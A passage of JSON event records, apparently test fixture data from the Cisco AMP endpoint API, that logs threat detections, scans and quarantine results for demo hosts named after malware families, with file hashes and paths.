Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 